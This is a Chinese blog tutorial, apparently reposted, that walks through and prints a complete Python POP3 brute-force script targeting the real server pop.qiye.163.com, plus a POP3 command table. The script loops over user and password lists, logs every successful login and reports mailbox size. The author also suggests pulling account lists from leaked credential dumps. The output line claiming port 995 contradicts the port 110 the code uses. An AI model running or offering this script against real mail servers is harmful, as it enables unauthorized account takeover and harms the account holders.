这篇文章主要介绍了 python 制作企业邮箱的爆破脚本的相关资料, 需要的朋友可以参考下
Python 是一种面向对象、解释型计算机程序设计语言,由 Guido van Rossum 于 1989 年底发明,第一个公开发行版发行于 1991 年。Python 语法简洁而清晰,具有丰富和强大的类库。它常被昵称为胶水语言,它能够把用其他语言制作的各种模块(尤其是 C/C++)很轻松地联结在一起。
按照师傅给的任务,写了一个企业邮箱的爆破脚本,后续还有 FTP,SSH 等一些爆破的脚本。
我先说下整体思路:
总体就是利用 python 的 poplib 模块来从 pop3 服务器上交互,根据获取的相关信息,产生结果。POP3 协议并不复杂,它也是采用的一问一答式的方式,你向服务器发送一个命令,服务器必然会回复一个信息.
1. 首先验证参数是否正确
Sys.argv[] 是用来获取命令行参数的,sys.argv[0] 表示代码本身文件路径,所以参数从 1 开始
2. 然后从用户密码文件中读取信息
3.pop.getwelcome() 用来获取连接服务器的响应状态
4. 然后就是脚本的核心代码部分
- server = "pop.qiye.163.com" //设置pop3服务器地址
- pop = poplib.POP3(server,110) //连接pop3服务器
- pop.user(user) //验证用户名
- auth = pop.pass_(passwd) //验证密码
- if auth.split(' ')[0]== "+OK": //判断响应的结果是否"OK"
- pring user,passwd
5. 最后输出出来相关的用户信息
脚本代码如下:
- #!/usr/bin/python
- # -*- coding: UTF-8 -*-
- '''
- @Author:joy_nick
- @博客:http://byd.dropsec.xyz/
- @Email Pop3 Brute Forcer
- '''
- import threading, time, random, sys, poplib
- from copy import copy
- if len(sys.argv) !=3:
- print "\t --------------------------------------------------\n"
- print "\t Usage: ./Emailpopbrute.py <userlist> <passlist>\n"
- sys.exit(1)
- server = "pop.qiye.163.com"
- success = []
- try:
- users = open(sys.argv[1], "r").readlines()
- except(IOError):
- print "[-] Error: urerlist打开失败!\n"
- sys.exit(1)
- try:
- words = open(sys.argv[2], "r").readlines()
- except(IOError):
- print "[-] Error: passlist打开失败!\n"
- sys.exit(1)
- try:
- pop = poplib.POP3(server,110)
- welcome = pop.getwelcome()
- print welcome
- pop.quit()
- except (poplib.error_proto):
- welcome = "No Response"
- pass
- def mailbruteforce(listuser,listpwd):
- if len(listuser) < 1 or len(listpwd) < 1 :
- print "An error occurred: No user or pass list"
- return 1
- for user in listuser:
- for value in listpwd :
- user = user.replace("\n","")
- value = value.replace("\n","")
- try:
- print "-"*12
- print "[+] User:",user,"Password:",value
- time.sleep(1)
- pop = poplib.POP3(server,110)
- pop.user(user)
- auth = pop.pass_(value)
- print auth
- if auth.split(' ')[0]!= "+OK" :
- pop.quit()
- print "unknown error !"
- continue
- if pop.stat()[1] is None or pop.stat()[1] < 1 :
- pop.quit()
- print "获取信息失败!"
- continue
- ret = (user,value,pop.stat()[0],pop.stat()[1])
- success.append(ret)
- pop.quit()
- break
- except:
- #print "An error occurred:", msg
- pass
- print "\t --------------------------------------------------\n"
- print "[+] Server:",server
- print "[+] Port: 995"
- print "[+] Users Loaded:",len(users)
- print "[+] Words Loaded:",len(words)
- print "[+] Server response:",welcome,"\n"
- mailbruteforce(users,words)
- print "\t[+] have weakpass :\t",len(success)
- if len(success) >=1:
- for ret in success:
- print "\n\n[+] Login successful:",ret[0], ret[1]
- print "\t[+] Mail:",ret[2],"emails"
- print "\t[+] Size:",ret[3],"bytes\n"
- print "\n[-] Done"
测试结果:
说明:
用户字典文件需要 @domain.com,类似 zhangsan@domain.com、lisi@domain.com、wangwu@domain.com 这样的。由于我也没有企业邮箱的账号密码,也就没测试成功的,要是感兴趣,可以搜一下相关社工裤。
附:
python 中 os._exit(), sys.exit(), exit() 的区别是什么?
pop3 收取邮件的过程一般是:
命令 poplib 方法 参数 状态 描述
-----------------------------------------------------------------------------------------------
USER user username 认可 用户名,此命令与下面的 pass 命令若成功,将导致状态转换
PASS pass_ password 认可 用户密码
APOP apop Name,Digest 认可 Digest 是 MD5 消息摘要
-----------------------------------------------------------------------------------------------
STAT stat None 处理 请求服务器发回关于邮箱的统计资料,如邮件总数和总字节数
UIDL uidl [Msg#] 处理 返回邮件的唯一标识符,POP3 会话的每个标识符都将是唯一的
LIST list [Msg#] 处理 返回邮件数量和每个邮件的大小
RETR retr [Msg#] 处理 返回由参数标识的邮件的全部文本
DELE dele [Msg#] 处理 服务器将由参数标识的邮件标记为删除,由 quit 命令执行
RSET rset None 处理 服务器将重置所有标记为删除的邮件,用于撤消 DELE 命令
TOP top [Msg#] 处理 服务器将返回由参数标识的邮件前 n 行内容,n 必须是正整数
NOOP noop None 处理 服务器返回一个肯定的响应
来源: http://www.phperz.com/article/17/0328/301479.html